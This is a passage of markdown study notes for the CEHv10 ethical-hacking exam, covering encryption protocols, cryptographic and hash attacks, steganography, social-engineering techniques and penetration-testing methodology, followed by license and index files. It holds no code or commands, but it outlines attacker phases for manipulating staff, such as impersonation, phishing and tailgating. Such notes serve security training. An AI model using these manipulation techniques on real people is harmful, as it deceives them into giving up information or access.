- Encrypting every bit of data stored on a disk or a disk volume
- Working similarly to text-message encryption and protecting data even when the OS is not active
- Preventing real-time exchange of information from compromising threats
- Ensuring security of the system
- Tools
  - VeraCrypt
  - Symantec Drive Encryption
  - BitLocker Drive Encryption

### Encrypted Communication

#### Secure Sockets Layer \(SSL\)

- Using both asymmetric and symmetric authentication mechanisms
- Encrypting data at the Transport Layer and above
- Using RSA asymmetric encryption and digital certificates
- Having largely been replaced by TLS

##### Channelsecurity

- **Private channel**: encrypted messages, a simple handshake defines the secret key
- **Authenticated channel**: the server endpoint is authenticated, the client endpoint is optionally authenticated
- **Reliable channel**: message transfer has an integrity check

##### SSL/TLS handshake process

```text
 --------                                        --------
 │Client│                                        │Server│
 --------                                        --------
    │                                               │
    │                 Cipher Suite                  │
    │---------------------------------------------->│
    │                                               │
    │            SSL Cert. (Public Key)             │
    │<----------------------------------------------│
    │                                               │
 Public Key                                         │
 Verified                                           │
    │            Encrypted Session Key              │
    │     (generated using server Public Key)       │
    │---------------------------------------------->│
    │                                          Session Key
    │                                          decrypted
    │           Session Key is in place             │
    │<--------------------------------------------->│
    │                                               │
    │  Session Key used for encryption & decryption │
    │<--------------------------------------------->│
 --------                                        --------
 │Client│                                        │Server│
 --------                                        --------
```

#### Transport Layer Security \(TLS\)

- Using RSA 1024 and 2048 bits, successor to SSL
- Allowing both client and server to authenticate to each other
- TLS Record Protocol provides a secured communication channel

##### Two Layers

- **TLS Record Protocol**
  - Connection is private: using symmetric cryptography for data encryption
  - Connection is reliable: providing a message integrity check
- **TLS Handshake Protocol**
  - Providing connection security that has three basic properties:
    - The peer's identity can be authenticated using asymmetric cryptography
    - The negotiation of a shared secret is secure
    - The negotiation is reliable
  - TLS Handshake Protocol operates on top of the TLS record layer

#### PGP \(Pretty Good Privacy\)

- Features conventional and public key cryptography
- The file format uses asymmetric encryption to encrypt a symmetric encryption key
- The symmetric encryption key encrypts the data
- Both symmetric and asymmetric keys are used, known as a hybrid cryptosystem
- Used for signing, compressing and encrypting emails, files and directories
- Using a decentralized model, called web of trust, where individual users sign keys that belong to other people to validate that the key holders are who they say they are

##### PGP Encryption and Decryption Workflow

```text
- Encryption
              Compress                        Encrypt
  Data ----------------> -------------------------------> Cipher text
         reduce patterns   with Random key as secret key

                             Encrypt
  Random key -------------------------------> Encrypted Random key
              with recipient's PUBLIC key

- Decryption
                                  Decrypt
  Encrypted Random key ---------------------------> Random key
                        with recipient's PRIVATE key

                    Decrypt
  Cipher text ---------------> Data
               with Random key
```

### Cryptography Attacks

- **Known-plaintext Attack** \(KPA\)
  - Obtaining some plaintext blocks along with the corresponding ciphertext and cipher
  - Working on block ciphers, linear cryptanalysis
- **Ciphertext-only Attack** \(COA\)
  - Gaining copies of several ciphertexts produced with the same algorithm
  - Recovering the encryption key from ciphertext
- **Chosen-plaintext Attack** \(CPA\)
  - Obtaining ciphertexts corresponding to a set of plaintexts of the attacker's own choosing
  - Attempting to derive the key used
- **Adaptive Chosen-plaintext Attack**
  - Modifying the content of the message by making a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions
- **Chosen-Ciphertext Attack** \(CCA\)
  - Obtaining plaintexts corresponding to a set of ciphertexts of the attacker's own choosing
  - Must have access to the communication channel between sender and receiver
  - **Lunchtime Attack** or **Midnight Attack**: attacker can have access to the system for only a limited amount of time, can access only a few plaintext-ciphertext pairs
  - **Adaptive Chosen-ciphertext** \(CCA2\): selecting a series of ciphertexts and then observing the resulting plaintext blocks
- **Related-key Attack**: obtaining ciphertexts encrypted under two different keys, useful if the attacker can obtain plaintext and matching ciphertext
- **Dictionary Attack**: constructing a dictionary of plaintext along with its corresponding ciphertext
- **Chosen-key Attack**: breaking an n bit key cipher in 2^\(n/2\) operations
- **Timing Attack**: repeatedly measuring exact execution times of modular exponentiation operations
- **Meet-in-the-middle Attack**
  - Using some sort of time-space trade-off to drastically reduce the effort to perform a brute-force attack \(e.g., transforming an attack that requires 2^128 time into one that takes 2^64 time and 2^64 space\)
  - May also refer to a type of attack over certain block ciphers, where the attacker decomposes the problem into two halves and proceeds on each part separately
- **Side-Channel Attack**: monitoring environmental factors such as power consumption, timing and delay
- **DUHK Attack** \(Don't Use Hard-Coded Keys\)
  - Allowing attackers to access keys in certain VPN implementations
  - Affecting devices using ANSI X9.31 with a hard-coded seed key
- **Escrow key**
  - Stored in a safe place by a trusted third party
  - Enabling companies to remain compliant with government mandates regarding their ability to gain access when necessary
  - Government Access to Keys \(GAK\): allowing the government to gain access to encrypted communications without interference from the company being investigated
- Tools
  - L0phtcrack: used mainly against Windows SAM files
  - John the Ripper: UNIX/Linux tool for the same purpose
  - CrypTool
  - Cryptobench

### Hash Algorithms

- One-way mathematical function that produces a fixed-length string \(hash\) based on the arrangement of data bits in the input
- Used for integrity
- **Salt**: used with a hash to obscure the hash, a collection of random bits

#### MD5 \(Message Digest algorithm\)

- Produces a 128 bit hash expressed as a 32 digit hexadecimal number
- Having serious flaws
- Still used for file download verification

#### SHA \(Secure Hash Algorithms\)

- **SHA-1**: 160 bits, developed by NSA
- **SHA-2**
  - Four separate hash functions
  - Outputs of 224, 256, 384 and 512 bits
  - SHA-256 uses 32-bit block words
  - SHA-512 uses 64-bit block words
- **SHA-3**: using sponge construction

#### RIPEMD \(RACE Integrity Primitives Evaluation Message Digest\)

- 160-bit hash algorithm
- Working through 80 stages made up of 6 blocks that execute 16 times each
- Using modulo 32 addition

#### Attacks

- **Collision**
  - Occurring when two or more files create the same hash output
  - Rare but can happen and can be used as an attack
- **Birthday attack**: attack that depends on the higher likelihood of collisions found between random attack attempts and a fixed degree of permutations
- **Rainbow Tables**: containing precomputed hashes to try and find out passwords
- Tools
  - HashCalc
  - MD5 Calculator

### Steganography

- Practice of concealing a message inside another medium so that only the sender and recipient know of its existence
- **Steganalysis**: the process of discovering the existence of hidden information in a medium, the reverse process of steganography

#### Methods

- Least significant bit insertion: changes the least meaningful bit
- Masks and filters \(grayscale images\): like watermarking
- Algorithmic transformation: hides in mathematical functions used in image compression
- **Noisy areas**: noisy areas are those that draw less attention, like areas with a great deal of natural color variation in the image
- **Transform domain technique**: steganography hides the information in significant parts of the cover image such as cropping, compression, and some other image processing areas

#### Ways to Identify

- Text: character positions are key; blank spaces, text patterns
- Image: file larger in size; some may have color palette faults
- Audio & Video: require statistical analysis

#### Tools

- QuickStego
- gifshuffle
- MP3Stego
- SNOW
- OpenStego
--------------------------------------------------------------------------------
/12-social_engineering.md:
--------------------------------------------------------------------------------
# 12-Social Engineering

## Table of Contents

- [Social Engineering](12-social_engineering.md#social-engineering)
  - [Social Engineering Phases](12-social_engineering.md#social-engineering-phases)
  - [Reasons This Works](12-social_engineering.md#reasons-this-works)
  - [Human-Based Attacks](12-social_engineering.md#human-based-attacks)
    - [Impersonation](12-social_engineering.md#impersonation)
    - [Eavesdropping](12-social_engineering.md#eavesdropping)
    - [Shoulder Surfing](12-social_engineering.md#shoulder-surfing)
    - [Dumpster Diving](12-social_engineering.md#dumpster-diving)
    - [Reverse Social Engineering](12-social_engineering.md#reverse-social-engineering)
    - [Piggybacking](12-social_engineering.md#piggybacking)
    - [Tailgating](12-social_engineering.md#tailgating)
    - [Rubber-hose Attack](12-social_engineering.md#rubber-hose-attack)
  - [Computer-Based Attacks](12-social_engineering.md#computer-based-attacks)
    - [Pop-Up Windows](12-social_engineering.md#pop-up-windows)
    - [Phishing](12-social_engineering.md#phishing)
      - [Spear Phishing](12-social_engineering.md#spear-phishing)
      - [Whaling](12-social_engineering.md#whaling)
      - [Pharming](12-social_engineering.md#pharming)
      - [Spimming \(Spam over Instant Messaging\)](12-social_engineering.md#spimming-spam-over-instant-messaging)
    - [Fake Antivirus](12-social_engineering.md#fake-antivirus)
    - [Mail Relaying](12-social_engineering.md#mail-relaying)
    - [Watering hole](12-social_engineering.md#watering-hole)
    - [Baitting attack](12-social_engineering.md#baitting-attack)
  - [Mobile-Based Attacks](12-social_engineering.md#mobile-based-attacks)
  - [Insider Threats](12-social_engineering.md#insider-threats)
    - [Insiders](12-social_engineering.md#insiders)
    - [Types of Threats](12-social_engineering.md#types-of-threats)

## Social Engineering

- The art of manipulating a person or group into providing information or a service they would otherwise not have given

### Social Engineering Phases

1. Research \(dumpster dive, visit websites, tour the company, etc.\)
2. Select the victim \(identify a frustrated employee or other target\)
3. Develop a relationship
4. Exploit the relationship \(collect sensitive information\)

### Reasons This Works

- Human nature \(trusting others\)
- Ignorance of social engineering efforts
- Fear \(of consequences of not providing the information\)
- Greed \(promised gain for providing requested information\)
- A sense of moral obligation

### Human-Based Attacks

- Always be pleasant because it gets more information

#### Impersonation

- Pretending to be someone you're not
- Can be anything from a help desk person up to an authoritative figure \(FBI agent\)
- Posing as a tech support professional can really quickly gain trust with a person
- **Vishing** \(Voice or VoIP phishing\): an impersonation technique in which the attacker uses Voice over IP \(VoIP\) technology to trick individuals into revealing their personal information

#### Eavesdropping

- Listening in on conversations about sensitive information

#### Shoulder Surfing

- Looking over someone's shoulder to get info
- Can be done long distance with binoculars, etc.
#### Dumpster Diving

- Looking for sensitive information in the trash
- Shredded papers can sometimes indicate sensitive info
- Passive activity

#### Reverse Social Engineering

- Getting someone to call you and give information
- Often happening with tech support, e.g. an email is sent to a user stating they need to call back due to a technical issue
- Involved techniques: **Sabotage**, **Marketing**, and **Support**

#### Piggybacking

- Attacker pretends that their badge is lost and asks someone to hold/open the door, **with consent** of the authorized person

#### Tailgating

- Attacker has a fake badge and walks in behind someone who has a valid one, **without consent** of the authorized person

#### Rubber-hose Attack

- Extracting secrets from people by use of torture or coercion

### Computer-Based Attacks

- Can begin with sites like Facebook where information about a person is available

#### Pop-Up Windows

- Hoax letters: warn the recipients of a non-existent computer virus threat
- Chain letters: offer free gifts
- Instant Chat Messenger: chats via instant chat messages to gather personal information
- Spam Emails

#### Phishing

- Crafting an email that appears legitimate but contains links to fake websites or to download malicious content
- **Ways to Avoid Phishing**
  - Beware unknown, unexpected or suspicious originators
  - Beware of who the email is addressed to
  - Verify phone numbers
  - Beware bad spelling or grammar
  - Always check links

##### Spear Phishing

- Targeting a person or a group with a phishing attack
- Can be more useful because the attack can be targeted

##### Whaling

- Going after CEOs or other C-level executives

##### Pharming

- Use of malicious code that redirects a user's traffic
- 2 ways to perform:
  - DNS Cache Poisoning
  - Host File Modification

##### Spimming \(Spam over Instant Messaging\)

- Using IM as a tool to spread spam

#### Fake Antivirus

- Pretending to be an anti-virus but is a malicious tool
- Very prevalent attack

#### Mail Relaying

- Bouncing e-mail from internal to external mail servers continuously
- Ensuring that no one knows who sent the spam out to thousands of users at a time

#### Watering hole

- The victim is of a particular group \(organization, industry, or region\)
- Attacker guesses or observes which websites the group often uses and infects one or more of them with malware. Eventually, some member of the targeted group becomes infected
- Attackers looking for specific information may only attack users coming from a specific IP address

#### Baitting attack

- Attacker leaves malware-infected floppy disks, CD-ROMs, or USB flash drives in locations people will find them, gives them legitimate and curiosity-piquing labels, and waits for victims

### Mobile-Based Attacks

- Publishing malicious apps
- Repackaging legitimate apps
- Fake security applications
- **SMiShing**: SMS Phishing

### Insider Threats

#### Insiders

- Privileged Users: most trusted employees of the company
- Disgruntled Employees: unhappy employees or contract workers
- Terminated Employees
- Accident-Prone Employees: accidentally losing a device or sending email to incorrect recipients, which leads to unintentional data disclosure
- Third Parties
- Undertrained Staff: trusted employee becomes an unintentional insider due to lack of cybersecurity training

#### Types of Threats

- Malicious insider: disgruntled or terminated employees who steal data or destroy company networks intentionally by injecting malware into the corporate network
- Negligent Insider: uneducated on potential security threats, more vulnerable to social engineering attacks
- Professional Insider: most harmful insider, using technical knowledge to identify weaknesses and vulnerabilities of the company's network and sell confidential information
- Compromised Insider: an outsider compromises an insider having access to critical assets of an organization
--------------------------------------------------------------------------------
/13-pen_testing.md:
--------------------------------------------------------------------------------
# 13-Pen Testing

## Table of Contents

- [Pen Testing](13-pen_testing.md#pen-testing)
  - [Security Audit](13-pen_testing.md#security-audit)
  - [Vulnerability Assessment](13-pen_testing.md#vulnerability-assessment)
    - [Product-Based Solutions](13-pen_testing.md#product-based-solutions)
    - [Service-Based Solutions](13-pen_testing.md#service-based-solutions)
    - [Tree-Based Assessment](13-pen_testing.md#tree-based-assessment)
    - [Inference-Based Assessment](13-pen_testing.md#inference-based-assessment)
  - [Penetration Testing](13-pen_testing.md#penetration-testing)
    - [Phases of Pen Testing](13-pen_testing.md#phases-of-pen-testing)
    - [Types of Pen Testing](13-pen_testing.md#types-of-pen-testing)
    - [Teams](13-pen_testing.md#teams)
    - [Automated Testing Tools](13-pen_testing.md#automated-testing-tools)
  - [Security Testing Methodology](13-pen_testing.md#security-testing-methodology)
    - [Proprietary Methodologies](13-pen_testing.md#proprietary-methodologies)
    - [Open-Source and Public Methodologies](13-pen_testing.md#open-source-and-public-methodologies)

## Pen Testing

### Security Audit

- Policy and procedure focused
- Tests whether the organization is following specific standards and policies

### Vulnerability Assessment

- Scans and tests for vulnerabilities but does **not intentionally exploit them**

#### Product-Based Solutions

Product-based solutions are installed in the organization's internal network. They are installed in a private or non-routable space, or in the Internet-addressable portion of an organization's network. If they are installed in the private network or, in other words, behind the firewall, they cannot always detect outside attacks.

#### Service-Based Solutions

Service-based solutions are offered by third parties, such as auditing or security consulting firms. Some solutions are hosted inside the network; others are hosted outside the network. A drawback of this solution is that attackers can audit the network from outside.

#### Tree-Based Assessment

In a tree-based assessment, the auditor selects different strategies for each machine or component of the information system. This approach relies on the administrator to provide a starting shot of intelligence, and then starts scanning continuously without incorporating any information found at the time of scanning.

#### Inference-Based Assessment

In an inference-based assessment, scanning starts by building an inventory of protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.
### Penetration Testing

- Looking for vulnerabilities and **actively seeking to exploit them**
- Need to make sure you have a great contract in place to protect you from liability
- Clearly defined, full scale test of security controls

#### Phases of Pen Testing

- **Pre-Attack Phase**: reconnaissance and data-gathering
  - Planning and preparation: Rules of Engagement \(RoE\)
  - Methodology design
  - Network information gathering
- **Attack Phase**: attempts to penetrate the network and execute attacks
  - Penetrating perimeter
  - Acquiring target
  - Escalating privileges
  - Execution, implantation, retracting
- **Post-Attack Phase**: cleanup to return a system to the pre-attack condition and deliver reports
  - Reporting
  - Clean-up
  - Artifact destruction

#### Types of Pen Testing

- **Black Box**: without any knowledge of the system or network
- **White Box**: complete knowledge of the system
- **Gray Box**: some knowledge of the system and/or network
- **External Assessment**: analyzing publicly available information; conducting network scanning, enumeration and testing from the network perimeter
- **Internal Assessment**: performed from within the organization, from various network access points

#### Teams

- **Red Team**: attacking
- **Blue Team**: defending
- **Purple Team**: doing both attacking and defending

#### Automated Testing Tools

- **Metasploit**: framework for developing and executing code against a remote target machine
- **Core Impact Pro**: best known, all-inclusive automated testing framework, tests everything from web applications and individual systems to network devices and wireless
- **CANVAS**: hundreds of exploits, automated exploitation system and extensive exploit development framework

### Security Testing Methodology

#### Proprietary Methodologies

- IBM
- McAfee Foundstone
- EC-Council LPT: Licensed Penetration Tester

#### Open-Source and Public Methodologies

- OWASP: Open Web Application Security Project
- OSSTMM: Open-Source Security Testing Methodology Manual
- ISSAF: Information System Security Assessment Framework
- NIST: National Institute of Standards and Technology
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/

   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

   1. Definitions.

      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.

      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.

      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.

      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.

      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.

      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.

      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).

      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.

      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."

      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by Licensor and
      subsequently incorporated within the Work.

   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.

   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.

   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:

      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and

      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and

      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and

      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding those notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.

5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.

6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.

7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.

8. Limitation of Liability.
In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.

9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability.

END OF TERMS AND CONDITIONS

APPENDIX: How to apply the Apache License to your work.

To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format.
We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.

Copyright 2020 Scott Craig
Modifications Copyright 2020 Kevin Cui

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# CEHv10 Study Guide++

Forked from [CEHv10StudyGuide](https://github.com/scottymcraig/CEHv10StudyGuide)

Many updates corresponding to the CEHv10 courseware.

My personal study notes.

## CEHv10 Study Guide

| CHAPTER | NAME | LINK |
| :------ | :------------------------------------- | :------------------------------------------------------------------------------ |
| 01 | Essential Knowledge | [01-essential_knowledge.md](01-essential_knowledge.md) |
| 02 | Reconnaissance and Footprinting | [02-reconnaissance_and_footprinting.md](02-reconnaissance_and_footprinting.md) |
| 03 | Scanning and Enumeration | [03-scanning_and_enumeration.md](03-scanning_and_enumeration.md) |
| 04 | Sniffing and Evasion | [04-sniffing_and_evasion.md](04-sniffing_and_evasion.md) |
| 05 | System Hacking | [05-system_hacking.md](05-system_hacking.md) |
| 06 | Web Server and Web Application Hacking | [06-web_server_and_web_application_hacking.md](06-web_server_and_web_application_hacking.md) |
| 07 | Wireless Network Hacking | [07-wireless_network_hacking.md](07-wireless_network_hacking.md) |
| 08 | Mobile and IoT Hacking | [08-mobile_and_iot_hacking.md](08-mobile_and_iot_hacking.md) |
| 09 | Security in Cloud Computing | [09-security_in_cloud_computing.md](09-security_in_cloud_computing.md) |
| 10 | Malware and Other Attacks | [10-malware_and_other_attacks.md](10-malware_and_other_attacks.md) |
| 11 | Cryptography | [11-cryptography.md](11-cryptography.md) |
| 12 | Social Engineering | [12-social_engineering.md](12-social_engineering.md) |
| 13 | Pen Testing | [13-pen_testing.md](13-pen_testing.md) |

Read it on GitBook: [https://kevcui.gitbook.io/cehv10studyguideplusplus](https://kevcui.gitbook.io/cehv10studyguideplusplus)

---

Enjoy your studies!

--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------

# Table of contents

* [CEHv10 Study Guide++](README.md)
* [01-Essential Knowledge](01-essential_knowledge.md)
* [02-Reconnaissance and Footprinting](02-reconnaissance_and_footprinting.md)
* [03-Scanning and Enumeration](03-scanning_and_enumeration.md)
* [04-Sniffing and Evasion](04-sniffing_and_evasion.md)
* [05-System Hacking](05-system_hacking.md)
* [06-Web Server and Web Application Hacking](06-web_server_and_web_application_hacking.md)
* [07-Wireless Network Hacking](07-wireless_network_hacking.md)
* [08-Mobile and IoT Hacking](08-mobile_and_iot_hacking.md)
* [09-Security in Cloud Computing](09-security_in_cloud_computing.md)
* [10-Malware and Other Attacks](10-malware_and_other_attacks.md)
* [11-Cryptography](11-cryptography.md)
* [12-Social Engineering](12-social_engineering.md)
* [13-Pen Testing](13-pen_testing.md)

--------------------------------------------------------------------------------